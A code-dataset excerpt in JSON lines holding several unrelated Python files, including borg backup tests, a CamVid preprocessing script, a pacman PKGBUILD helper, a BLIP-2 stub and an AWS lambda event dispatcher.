self.assert_equal(sorted(os.listdir(\"output\")), [\"file2\"])\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test3\", \"input\", \"--exclude=input/./file1\")\n with changedir(\"output\"):\n self.cmd(f\"--repo={self.repository_location}\", \"extract\", \"test3\")\n self.assert_equal(sorted(os.listdir(\"output/input\")), [\"file2\"])\n\n def test_repeated_files(self):\n self.create_regular_file(\"file1\", size=1024 * 80)\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test\", \"input\", \"input\")\n\n @pytest.mark.skipif(\"BORG_TESTS_IGNORE_MODES\" in os.environ, reason=\"modes unreliable\")\n def test_umask(self):\n self.create_regular_file(\"file1\", size=1024 * 80)\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test\", \"input\")\n mode = os.stat(self.repository_path).st_mode\n self.assertEqual(stat.S_IMODE(mode), 0o700)\n\n def test_create_dry_run(self):\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"--dry-run\", \"test\", \"input\")\n # Make sure no archive has been created\n with Repository(self.repository_path) as repository:\n manifest = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)\n self.assert_equal(len(manifest.archives), 0)\n\n def test_progress_on(self):\n self.create_regular_file(\"file1\", size=1024 * 80)\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n output = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test4\", \"input\", \"--progress\")\n self.assert_in(\"\\r\", output)\n\n def test_progress_off(self):\n self.create_regular_file(\"file1\", size=1024 * 80)\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n output = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test5\", \"input\")\n self.assert_not_in(\"\\r\", output)\n\n def test_file_status(self):\n \"\"\"test that various file status show expected results\n\n clearly incomplete: only tests for the weird \"unchanged\" status for now\"\"\"\n self.create_regular_file(\"file1\", size=1024 * 80)\n time.sleep(1) # file2 must have newer timestamps than file1\n self.create_regular_file(\"file2\", size=1024 * 80)\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n output = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"--list\", \"test\", \"input\")\n self.assert_in(\"A input/file1\", output)\n self.assert_in(\"A input/file2\", output)\n # should find first file as unmodified\n output = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"--list\", \"test2\", \"input\")\n self.assert_in(\"U input/file1\", output)\n # this is expected, although surprising, for why, see:\n # https://borgbackup.readthedocs.org/en/latest/faq.html#i-am-seeing-a-added-status-for-a-unchanged-file\n self.assert_in(\"A input/file2\", output)\n\n def test_file_status_cs_cache_mode(self):\n \"\"\"test that a changed file with faked \"previous\" mtime still gets backed up in ctime,size cache_mode\"\"\"\n self.create_regular_file(\"file1\", contents=b\"123\")\n time.sleep(1) # file2 must have newer timestamps than file1\n self.create_regular_file(\"file2\", size=10)\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n output = self.cmd(\n f\"--repo={self.repository_location}\", \"create\", \"test1\", \"input\", \"--list\", \"--files-cache=ctime,size\"\n )\n # modify file1, but cheat with the mtime (and atime) and also keep same size:\n st = os.stat(\"input/file1\")\n self.create_regular_file(\"file1\", contents=b\"321\")\n os.utime(\"input/file1\", ns=(st.st_atime_ns, st.st_mtime_ns))\n # this mode uses ctime for change detection, so it should find file1 as modified\n output = self.cmd(\n f\"--repo={self.repository_location}\", \"create\", \"test2\", \"input\", \"--list\", \"--files-cache=ctime,size\"\n )\n self.assert_in(\"M input/file1\", output)\n\n def test_file_status_ms_cache_mode(self):\n \"\"\"test that a chmod'ed file with no content changes does not get chunked again in mtime,size cache_mode\"\"\"\n self.create_regular_file(\"file1\", size=10)\n time.sleep(1) # file2 must have newer timestamps than file1\n self.create_regular_file(\"file2\", size=10)\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n output = self.cmd(\n f\"--repo={self.repository_location}\", \"create\", \"--list\", \"--files-cache=mtime,size\", \"test1\", \"input\"\n )\n # change mode of file1, no content change:\n st = os.stat(\"input/file1\")\n os.chmod(\"input/file1\", st.st_mode ^ stat.S_IRWXO) # this triggers a ctime change, but mtime is unchanged\n # this mode uses mtime for change detection, so it should find file1 as unmodified\n output = self.cmd(\n f\"--repo={self.repository_location}\", \"create\", \"--list\", \"--files-cache=mtime,size\", \"test2\", \"input\"\n )\n self.assert_in(\"U input/file1\", output)\n\n def test_file_status_rc_cache_mode(self):\n \"\"\"test that files get rechunked unconditionally in rechunk,ctime cache mode\"\"\"\n self.create_regular_file(\"file1\", size=10)\n time.sleep(1) # file2 must have newer timestamps than file1\n self.create_regular_file(\"file2\", size=10)\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n output = self.cmd(\n f\"--repo={self.repository_location}\", \"create\", \"--list\", \"--files-cache=rechunk,ctime\", \"test1\", \"input\"\n )\n # no changes here, but this mode rechunks unconditionally\n output = self.cmd(\n f\"--repo={self.repository_location}\", \"create\", \"--list\", \"--files-cache=rechunk,ctime\", \"test2\", \"input\"\n )\n self.assert_in(\"A input/file1\", output)\n\n def test_file_status_excluded(self):\n \"\"\"test that excluded paths are listed\"\"\"\n\n self.create_regular_file(\"file1\", size=1024 * 80)\n time.sleep(1) # file2 must have newer timestamps than file1\n self.create_regular_file(\"file2\", size=1024 * 80)\n if has_lchflags:\n self.create_regular_file(\"file3\", size=1024 * 80)\n platform.set_flags(os.path.join(self.input_path, \"file3\"), stat.UF_NODUMP)\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n output = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"--list\", \"--exclude-nodump\", \"test\", \"input\")\n self.assert_in(\"A input/file1\", output)\n self.assert_in(\"A input/file2\", output)\n if has_lchflags:\n self.assert_in(\"x input/file3\", output)\n # should find second file as excluded\n output = self.cmd(\n f\"--repo={self.repository_location}\",\n \"create\",\n \"test1\",\n \"input\",\n \"--list\",\n \"--exclude-nodump\",\n \"--exclude\",\n \"*/file2\",\n )\n self.assert_in(\"U input/file1\", output)\n self.assert_in(\"x input/file2\", output)\n if has_lchflags:\n self.assert_in(\"x input/file3\", output)\n\n def test_file_status_counters(self):\n \"\"\"Test file status counters in the stats of `borg create --stats`\"\"\"\n\n def to_dict(borg_create_output):\n borg_create_output = borg_create_output.strip().splitlines()\n borg_create_output = [line.split(\":\", 1) for line in borg_create_output]\n borg_create_output = {\n key: int(value)\n for key, value in borg_create_output\n if key in (\"Added files\", \"Unchanged files\", \"Modified files\")\n }\n return borg_create_output\n\n # Test case set up: create a repository\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n # Archive an empty dir\n result = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"--stats\", \"test_archive\", self.input_path)\n result = to_dict(result)\n assert result[\"Added files\"] == 0\n assert result[\"Unchanged files\"] == 0\n assert result[\"Modified files\"] == 0\n # Archive a dir with two added files\n self.create_regular_file(\"testfile1\", contents=b\"test1\")\n time.sleep(0.01) # testfile2 must have newer timestamps than testfile1\n self.create_regular_file(\"testfile2\", contents=b\"test2\")\n result = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"--stats\", \"test_archive2\", self.input_path)\n result = to_dict(result)\n assert result[\"Added files\"] == 2\n assert result[\"Unchanged files\"] == 0\n assert result[\"Modified files\"] == 0\n # Archive a dir with 1 unmodified file and 1 modified\n self.create_regular_file(\"testfile1\", contents=b\"new data\")\n result = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"--stats\", \"test_archive3\", self.input_path)\n result = to_dict(result)\n # Should process testfile2 as added because of\n # https://borgbackup.readthedocs.io/en/stable/faq.html#i-am-seeing-a-added-status-for-an-unchanged-file\n assert result[\"Added files\"] == 1\n assert result[\"Unchanged files\"] == 0\n assert result[\"Modified files\"] == 1\n\n def test_create_json(self):\n self.create_regular_file(\"file1\", size=1024 * 80)\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n create_info = json.loads(self.cmd(f\"--repo={self.repository_location}\", \"create\", \"--json\", \"test\", \"input\"))\n # The usual keys\n assert \"encryption\" in create_info\n assert \"repository\" in create_info\n assert \"cache\" in create_info\n assert \"last_modified\" in create_info[\"repository\"]\n\n archive = create_info[\"archive\"]\n assert archive[\"name\"] == \"test\"\n assert isinstance(archive[\"command_line\"], list)\n assert isinstance(archive[\"duration\"], float)\n assert len(archive[\"id\"]) == 64\n assert \"stats\" in archive\n\n def test_create_topical(self):\n self.create_regular_file(\"file1\", size=1024 * 80)\n time.sleep(1) # file2 must have newer timestamps than file1\n self.create_regular_file(\"file2\", size=1024 * 80)\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n # no listing by default\n output = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test\", \"input\")\n self.assert_not_in(\"file1\", output)\n # shouldn't be listed even if unchanged\n output = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test0\", \"input\")\n self.assert_not_in(\"file1\", output)\n # should list the file as unchanged\n output = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test1\", \"input\", \"--list\", \"--filter=U\")\n self.assert_in(\"file1\", output)\n # should *not* list the file as changed\n output = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test2\", \"input\", \"--list\", \"--filter=AM\")\n self.assert_not_in(\"file1\", output)\n # change the file\n self.create_regular_file(\"file1\", size=1024 * 100)\n # should list the file as changed\n output = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test3\", \"input\", \"--list\", \"--filter=AM\")\n self.assert_in(\"file1\", output)\n\n @pytest.mark.skipif(not are_fifos_supported(), reason=\"FIFOs not supported\")\n def test_create_read_special_symlink(self):\n from threading import Thread\n\n def fifo_feeder(fifo_fn, data):\n fd = os.open(fifo_fn, os.O_WRONLY)\n try:\n os.write(fd, data)\n finally:\n os.close(fd)\n\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n data = b\"foobar\" * 1000\n\n fifo_fn = os.path.join(self.input_path, \"fifo\")\n link_fn = os.path.join(self.input_path, \"link_fifo\")\n os.mkfifo(fifo_fn)\n os.symlink(fifo_fn, link_fn)\n\n t = Thread(target=fifo_feeder, args=(fifo_fn, data))\n t.start()\n try:\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"--read-special\", \"test\", \"input/link_fifo\")\n finally:\n t.join()\n with changedir(\"output\"):\n self.cmd(f\"--repo={self.repository_location}\", \"extract\", \"test\")\n fifo_fn = \"input/link_fifo\"\n with open(fifo_fn, \"rb\") as f:\n extracted_data = f.read()\n assert extracted_data == data\n\n def test_create_read_special_broken_symlink(self):\n os.symlink(\"somewhere does not exist\", os.path.join(self.input_path, \"link\"))\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"--read-special\", \"test\", \"input\")\n output = self.cmd(f\"--repo={self.repository_location}\", \"list\", \"test\")\n assert \"input/link -> somewhere does not exist\" in output\n\n def test_log_json(self):\n self.create_test_files()\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n log = self.cmd(\n f\"--repo={self.repository_location}\", \"create\", \"test\", \"input\", \"--log-json\", \"--list\", \"--debug\"\n )\n messages = {} # type -> message, one of each kind\n for line in log.splitlines():\n msg = json.loads(line)\n messages[msg[\"type\"]] = msg\n\n file_status = messages[\"file_status\"]\n assert \"status\" in file_status\n assert file_status[\"path\"].startswith(\"input\")\n\n log_message = messages[\"log_message\"]\n assert isinstance(log_message[\"time\"], float)\n assert log_message[\"levelname\"] == \"DEBUG\" # there should only be DEBUG messages\n assert isinstance(log_message[\"message\"], str)\n\n def test_common_options(self):\n self.create_test_files()\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n log = self.cmd(f\"--repo={self.repository_location}\", \"--debug\", \"create\", \"test\", \"input\")\n assert \"security: read previous location\" in log\n\n def test_hashing_time(self):\n def extract_hashing_time(borg_create_output):\n borg_create_output = borg_create_output.strip().splitlines()\n borg_create_output = [line.split(\":\", 1) for line in borg_create_output]\n hashing_time = [line for line in borg_create_output if line[0] == \"Time spent in hashing\"].pop()\n hashing_time = hashing_time[1]\n hashing_time = float(hashing_time.removesuffix(\" seconds\"))\n return hashing_time\n\n # Test case set up: create a repository and a file\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", \"--encryption=none\")\n self.create_regular_file(\"testfile\", contents=randbytes(6000000))\n # Archive\n result = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"--stats\", \"test_archive\", self.input_path)\n hashing_time = extract_hashing_time(result)\n\n assert hashing_time > 0.0\n\n def test_chunking_time(self):\n def extract_chunking_time(borg_create_output):\n borg_create_output = borg_create_output.strip().splitlines()\n borg_create_output = [line.split(\":\", 1) for line in borg_create_output]\n chunking_time = [line for line in borg_create_output if line[0] == \"Time spent in chunking\"].pop()\n chunking_time = chunking_time[1]\n chunking_time = float(chunking_time.removesuffix(\" seconds\"))\n return chunking_time\n\n # Test case set up: create a repository and a file\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.create_regular_file(\"testfile\", contents=randbytes(5000000))\n # Archive\n result = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"--stats\", \"test_archive\", self.input_path)\n chunking_time = extract_chunking_time(result)\n\n assert chunking_time > 0.0\n\n\nclass RemoteArchiverTestCase(RemoteArchiverTestCaseBase, ArchiverTestCase):\n \"\"\"run the same tests, but with a remote repository\"\"\"\n\n\n@unittest.skipUnless(\"binary\" in BORG_EXES, \"no borg.exe available\")\nclass ArchiverTestCaseBinary(ArchiverTestCaseBinaryBase, ArchiverTestCase):\n \"\"\"runs the same tests, but via the borg binary\"\"\"\n\n @unittest.skip(\"test_basic_functionality seems incompatible with fakeroot and/or the binary.\")\n def test_basic_functionality(self):\n pass\n","repo_name":"0xallie/borg","sub_path":"src/borg/testsuite/archiver/create_cmd.py","file_name":"create_cmd.py","file_ext":"py","file_size_in_byte":38670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"33955517013","text":"import os\nimport shutil\nimport torch\n\nimport torchvision.transforms as transforms\nimport torchvision.models as models\nimport torch.nn as nn\nimport numpy as np\n\nfrom PIL import Image\n\n\ndef mkdir(dir_path, dir_name, forced_remove=False):\n new_dir = '{}/{}'.format(dir_path, dir_name)\n if forced_remove and os.path.isdir(new_dir):\n shutil.rmtree(new_dir)\n if not os.path.isdir(new_dir):\n os.makedirs(new_dir)\n\n\ndef touch(file_path, file_name, forced_remove=False):\n new_file = '{}/{}'.format(file_path, file_name)\n assert os.path.isdir(\n file_path), ' \\\"{}\\\" does not exist.'.format(file_path)\n if forced_remove and os.path.isfile(new_file):\n os.remove(new_file)\n if not os.path.isfile(new_file):\n open(new_file, 'a').close()\n\n\ndef write_file(file_path, file_name, content, new_line=True, forced_remove_prev=False):\n touch(file_path, file_name, forced_remove=forced_remove_prev)\n with open('{}/{}'.format(file_path, file_name), 'a') as f:\n f.write('{}'.format(content))\n if new_line:\n f.write('\\n')\n f.close()\n\n\ndef copy_file(src_path, src_file_name, dst_path, dst_file_name):\n shutil.copyfile('{}/{}'.format(src_path, src_file_name),\n '{}/{}'.format(dst_path, dst_file_name))\n\n\ndef ls(dir_path):\n return os.listdir(dir_path)\n\n\ndef generate_ann_mask(mask_path, labels):\n mask = np.array(Image.open(mask_path))\n ann = np.zeros((len(labels), mask.shape[0], mask.shape[1]))\n for ix, (label) in enumerate(labels):\n r, g, b, cat = label\n r, g, b = int(r), int(g), int(b)\n label_mask = (mask[:, :, 0] == r) & (\n mask[:, :, 1] == g) & (mask[:, :, 2] == b)\n ann[ix, :, :] = label_mask\n ann = np.argmax(ann, axis=0)\n return torch.tensor(ann)\n\n\ndef preprocess(mode, items_name, camvid_path, annotation_version):\n assert mode in [\n 'train', 'val', 'test'], 'preprocess mode must be \"train\" or \"val\" or \"test\".'\n assert annotation_version in [1, 2], 'annotation_version must be 1 or 2.'\n\n mkdir('.', mode, forced_remove=False)\n mkdir('./{}'.format(mode), 'images', forced_remove=False)\n mkdir('./{}'.format(mode),\n 'annotations_v{}'.format(annotation_version), forced_remove=False)\n\n labels = [line.split() for line in open(\n './labels_v{}.txt'.format(annotation_version))]\n for label in labels:\n (_, _, _, cat_name) = label\n write_file('{}'.format(mode),\n 'labels_v{}'.format(annotation_version),\n '{}'.format(cat_name),\n new_line=True,\n forced_remove_prev=False)\n\n for ix, (item_name) in enumerate(items_name):\n copy_file('{}/images'.format(camvid_path), item_name,\n './{}/images'.format(mode), item_name)\n\n ann = generate_ann_mask(\n '{}/masks/{}'.format(camvid_path, item_name), labels)\n torch.save(ann, './{}/annotations_v{}/{}'.format(mode,\n annotation_version,\n os.path.splitext(item_name)[0]))\n\n write_file(mode, 'file_names', item_name,\n new_line=True, forced_remove_prev=False)\n print('%s(version %d): %d/%d( %.2f%%)' % (mode,\n annotation_version,\n ix,\n len(items_name),\n (ix/len(items_name))*100\n ))\n\n\ndef _main():\n camvid_path = '.'\n annotation_versions = [1, 2]\n\n images_name = ls('{}/images'.format(camvid_path))\n\n percent = dict()\n percent['train'], percent['val'], percent['test'] = 0.80, 0.05, 0.15\n assert percent['train']+percent['val'] + \\\n percent['test'] == 1, '\"train percent\"+ \"val percent\"+ \"test percent\" must be 1.'\n\n items_name = dict()\n items_name['train'] = images_name[0: int(\n len(images_name) * percent['train'])]\n items_name['val'] = images_name[int(len(images_name) * percent['train']): int(\n len(images_name) * (percent['train'] + percent['val']))]\n items_name['test'] = images_name[int(\n len(images_name) * (percent['train'] + percent['val'])): len(images_name)]\n\n for annotation_version in annotation_versions:\n for mode in ['train', 'val', 'test']:\n preprocess(mode, items_name[mode], camvid_path, annotation_version)\n\n\nif __name__ == \"__main__\":\n _main()\n","repo_name":"ahedayat/U-Net","sub_path":"datasets/camvid/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":4605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"8220919244","text":"import logging\nimport os\nimport pycman\nimport re\nimport subprocess\n\ndef parse_pkgbuild(path, shell=\"bash\"):\n '''\n Source variable from a PKGBUILD\n Use bash to export vars\n\n WARNING: CODE IS EXECUTED\n '''\n # use shell sourcing to resolve custom bashism into PKGBUILD\n argv = [shell, \"-c\", 'set -a; source \"%s\"; pkgname0=\"${pkgname[0]}\"; exec printenv -0' % path]\n # Log it as warn because it's dangerous\n logging.warn(\"Running bash to source file %s\" % path)\n proc = subprocess.Popen(argv, stdout=subprocess.PIPE, shell=False)\n bashout = proc.communicate(\"\")[0].decode().split(\"\\0\")\n bashenv = dict([x.split(\"=\", 1) for x in bashout if \"=\" in x])\n # remove current env\n for env in os.environ:\n bashenv.pop(env, None)\n return bashenv\n\ndef pkgbuild_set_version(path, version, reset=True):\n '''\n Change PKGBUILD $pkgver to version\n if a variable $_pkgver is present, this one will be updated instead of $pkgver\n If reset is True, $pkgrel will be set to 1\n '''\n wspces = \"[ \\t\\r\\f\\v]\"\n data = open(path, \"r\").read()\n # prefer to replace $_pkgver\n var = \"pkgver\" if re.search(\"^%s*_pkgver=\" % wspces, data,\n re.MULTILINE) is None else \"_pkgver\"\n data = re.sub(\"^(%s*%s=).*$\" % (wspces, var),\n \"\\g<1>%s\" % version, data, flags=re.MULTILINE)\n if reset:\n data = re.sub(\"^(%s*pkgrel=).*\" % wspces, \"\\g<1>1\", data,\n flags=re.MULTILINE)\n open(path, \"w\").write(data)\n\ndef pkgbuild_update_checksums(path):\n '''\n Update checksums of PKGBUILD\n Use pacman provided scripts updpkgsums\n '''\n subprocess.check_call([\"updpkgsums\"], shell=False, close_fds=True)\n\nclass Pacman(object):\n '''\n Cheap abstration of archlinux package manager\n This object is a singleton to avoid pyalpm to use too much memory\n '''\n\n _instance = None\n\n def __new__(cls, config=\"/etc/pacman.conf\"):\n # singleton design pattern\n if cls._instance is None:\n cls._instance = object.__new__(cls)\n cls._handle = pycman.config.PacmanConfig(config).initialize_alpm()\n return cls._instance\n\n def find_pkg(self, name, repos=None):\n '''\n find a package named name in repos\n '''\n if repos is None:\n dbs = self._handle.get_syncdbs()\n else:\n dbs = [ db for db in self._handle.get_syncdbs() if db.name in repos ]\n # looking into db for package name\n for db in dbs:\n pkg = db.get_pkg(name)\n if pkg is not None:\n return (db, pkg)\n return (None, None)\n\n# vim:set ts=4 sw=4 et ai:\n","repo_name":"seblu/archversion","sub_path":"src/lib/archversion/pacman.py","file_name":"pacman.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"81"} +{"seq_id":"73748473226","text":"# Algorithm for a palindrome checker\n\ndef is_Palindrome(pd):\n startOfIndex = 0\n endOfIndex = len(pd) - 1\n\n for i in pd:\n if pd[startOfIndex] != pd[endOfIndex]:\n return False\n return True\n\n\nprint(is_Palindrome('racecar'))\n","repo_name":"asvirts/meta-back-end-dev","sub_path":"Python Programming/Lessons/algorithms.py","file_name":"algorithms.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7108706557","text":"import torch\nimport torch.nn as nn \n\nfrom transformers import BertTokenizer\n\n\nclass Qformer(nn.Module):\n def __init__(self) -> None:\n super().__init__()\n\n\nclass Blip2(nn.Module):\n def __init__(self) -> None:\n super().__init__()\n\n self.tokenizer = None \n self.vision_encoder = None \n self.qformer = None \n\n self.queries = nn.Parameter(torch.zeros(1, 32, 768)) \n\n\n @classmethod\n def init_tokenizer(cls, truncation_side='right'):\n tokenier = BertTokenizer.from_pretrained('bert-base-uncased', truncation_side=truncation_side)\n tokenier.add_special_tokens('bos_token', '[DEC]')\n return tokenier\n ","repo_name":"lyuwenyu/AI","sub_path":"mllm/lavis/blip2.py","file_name":"blip2.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"630815334","text":"#! /usr/bin/python3\n\nfrom collections import defaultdict\n\ndef merge_dicts(dicts):\n res = defaultdict(list)\n for dictionary in dicts:\n for key,values in dictionary.items():\n if isinstance(values,list):\n res[key].extend(values)\n else:\n res[key].append(values)\n\n return res\n\n\nif __name__ == '__main__':\n #check merge_dicts\n a = {'a': [1,2,3], 'b': 2, 'c': [2,1]}\n b = {'a': 2, 'b': [12,2,2,2], 'd': 2}\n c = {'a': 2, 'b': 2, 'e': 1}\n print(merge_dicts([a,b,c]))\n","repo_name":"MateusGilbert/nn_temp_compression","sub_path":"aux_functions.py","file_name":"aux_functions.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74794737545","text":"class Solution:\n def wiggleSort(self, nums: List[int]) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n arr = sorted(nums)\n \n r = len(arr)-1\n for i in range(1, len(nums), 2):\n nums[i] = arr[r]\n r -= 1\n \n for i in range(0, len(nums), 2):\n nums[i] = arr[r]\n r -= 1\n","repo_name":"novayo/LeetCode","sub_path":"0324_Wiggle_Sort_II/try_1.py","file_name":"try_1.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"4992741628","text":"from layer import Layer, Env\nfrom lambdas.user_event.user_added import user_added_data\nfrom lambdas.user_event.user_deleted1 import user_deleted_data\nfrom lambdas.user_device_event.user_device_binding import user_device_binding_data\nfrom lambdas.user_event.user_updated import user_update_data\n\nfrom devicemanagement.device_cosume import consume_device_event\n\n\ndef consume(data, l: Layer):\n print(\"data type 是--->:{},data 是{}\".format(type(data), data))\n # UserAdded.event\n # ''' [{'userId': '2030836', 'immutableIdentity': 'tcl-sso:', 'userName': 'Ethan', 'mobile': '13120575591',\n # 'email': 'yuyoung@613.com', 'login_details': [{'accountSystemId': 'tcl-sso', 'loginAccountId': '23222233'}],\n # 'tenantId': '', 'idType': 'passport', 'idNo': '2121212111', 'partnerId': 'china_iot',\n # 'messageType': 'UserAdded.command'}]'''\n\n # UserDeleted.event\n # [{'userId': '2030838', 'partnerId': 'china_iot', 'messageType': 'UserDeleted.event'}, {'userId': '2030839', 'partnerId': 'china_iot', 'messageType': 'UserDeleted.event'}]\n\n # UserDeviceBinding.Event\n # [{'deviceId': '2030838', 'userId': '2030837', 'userRole': '1', 'partnerId': 'china_iot', 'messageType': 'UserDeviceBinding.Event'}]\n session = l.session()\n\n try:\n assert isinstance(data, list)\n # 新增\n if data[0][\"messageType\"] == \"UserAdded.Event\":\n user_added_data(data, session)\n elif data[0][\"messageType\"] == \"UserDeleted.Event\":\n user_deleted_data(data, session)\n elif data[0][\"messageType\"] == \"UserUpdated.Event\":\n user_update_data(data, session)\n elif data[0][\"messageType\"] == \"UserDeviceBinding.Event\":\n user_device_binding_data(data, session)\n else:\n # 处理device的事件\n consume_device_event(data, l)\n # print(\"不是要处理的event的类型,数据为{}\".format(data))\n # pass\n\n except Exception as e:\n print(e)\n session.rollback()\n finally:\n session.close()\n\n\nif __name__ == '__main__':\n l = Layer(Env.DEV)\n user_added_event = [\n {'userId': '400002', 'userName': 'Ethan', 'mobile': '13120575592',\n 'immutable_identity': 'tcl-sso:sso-123456',\n 'email': 'yuyoung@613.com',\n 'login_details': [{'accountSystemId': 'tcl-sso', 'loginAccountId': 'sso-44444'}],\n 'tenantId': 'TCL', 'partnerId': 'ciot',\n 'messageType': 'UserAdded.Event'}]\n\n user_deleted_event = [{'userId': '2030841', 'partnerId': 'china_iot', 'messageType': 'UserDeleted.Event'},\n # {'userId': '2030839', 'partnerId': 'china_iot', 'messageType': 'UserDeleted.event'}\n ]\n user_updated_event = [\n {'userId': '2030841', 'userName': 'Ethan3', 'mobile': '13120575592',\n 'email': 'yuyoung@613.com',\n 'login_details': [{'accountSystemId': 'tcl-sso', 'loginAccountId': 'sso-2030841'}],\n 'tenantId': 'TCL', 'partnerId': 'china_iot',\n 'messageType': 'UserUpdated.Event'}]\n\n user_device_binding_event = [\n {'deviceId': '2030838', 'userId': '2030841', 'userRole': '1', 'partnerId': 'oversea_iot',\n 'messageType': 'UserDeviceBinding.Event'}]\n consume(user_device_binding_event, l)\n","repo_name":"EayonYu/spider-lamdas","sub_path":"lambdas/consume.py","file_name":"consume.py","file_ext":"py","file_size_in_byte":3286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4783900780","text":"import subprocess\nimport os \n\n\n\n\n#Ripping the USDA site data for search criteria\nrequest = input(\"Search for what?: \")\nsaved = request \nrequest = request.replace(\" \", \"+\")\nbareRequest = \"https://ndb.nal.usda.gov/ndb/search/list?SYNCHRONIZER_TOKEN=920de5f3-33a0-4c7b-9b55-04f3a1325774&SYNCHRONIZER_URI=%2Fndb%2Fsearch%2Flist&qt=&qlookup=\" + request + \"&ds=&manu=\"\nretcode = subprocess.call(['wget', '-O', 'file.txt', bareRequest], stderr=subprocess.DEVNULL)\n\n#Opening ripped data\ndownloadData = open(\"file.txt\", \"r\")\ncount = 0 \nfor x in downloadData:\n if saved.lower() in x.lower():\n print(x)\n count+=1\n\nprint(\"Read \" + str(count) + \" lines\")\n\n","repo_name":"nwrner/FunStuff","sub_path":"spyglass.py","file_name":"spyglass.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74886122826","text":"from machine import Pin, PWM\nfrom time import sleep\n\n#0,2,4,5,12,13,14, and 15 all support PWM\nL1 = Pin(5)\nL2 = Pin(4)\nR1 = Pin(12)\nR2 = Pin(13)\n\npwm_L1 = PWM(L1)\npwm_L2 = PWM(L2)\npwm_R1 = PWM(R1)\npwm_R2 = PWM(R2)\n\n\npwm_L1.freq(100)\npwm_L2.freq(100)\npwm_R1.freq(100)\npwm_R2.freq(100)\n\n#min speed: 350\ndef stop():\n pwm_L1.duty(0)\n pwm_L2.duty(0)\n pwm_R1.duty(0)\n pwm_R2.duty(0)\n\n\ndef forward(l=512,r=512):\n pwm_L1.duty(0)\n pwm_L2.duty(l)\n pwm_R1.duty(0)\n pwm_R2.duty(r)\n\ndef backward(l=512,r=512):\n pwm_L1.duty(l)\n pwm_L2.duty(0)\n pwm_R1.duty(r)\n pwm_R2.duty(0)\n\n\nstop()\n\n\n","repo_name":"netbeaver/micropython_joystick","sub_path":"move_pwm.py","file_name":"move_pwm.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"22000516796","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\"\"\"cx_Freeze installation routines built on top of normal setup.py.\"\"\"\r\nimport os, site, sys\r\n\r\nos.environ[\"GAUPOL_FREEZING\"] = \"1\"\r\nfrom setup import *\r\nimport cx_Freeze\r\n\r\nincludes = (\"aeidon\", \"gaupol\", \"gi\")\r\ninclude_files = []\r\ngnome_path = 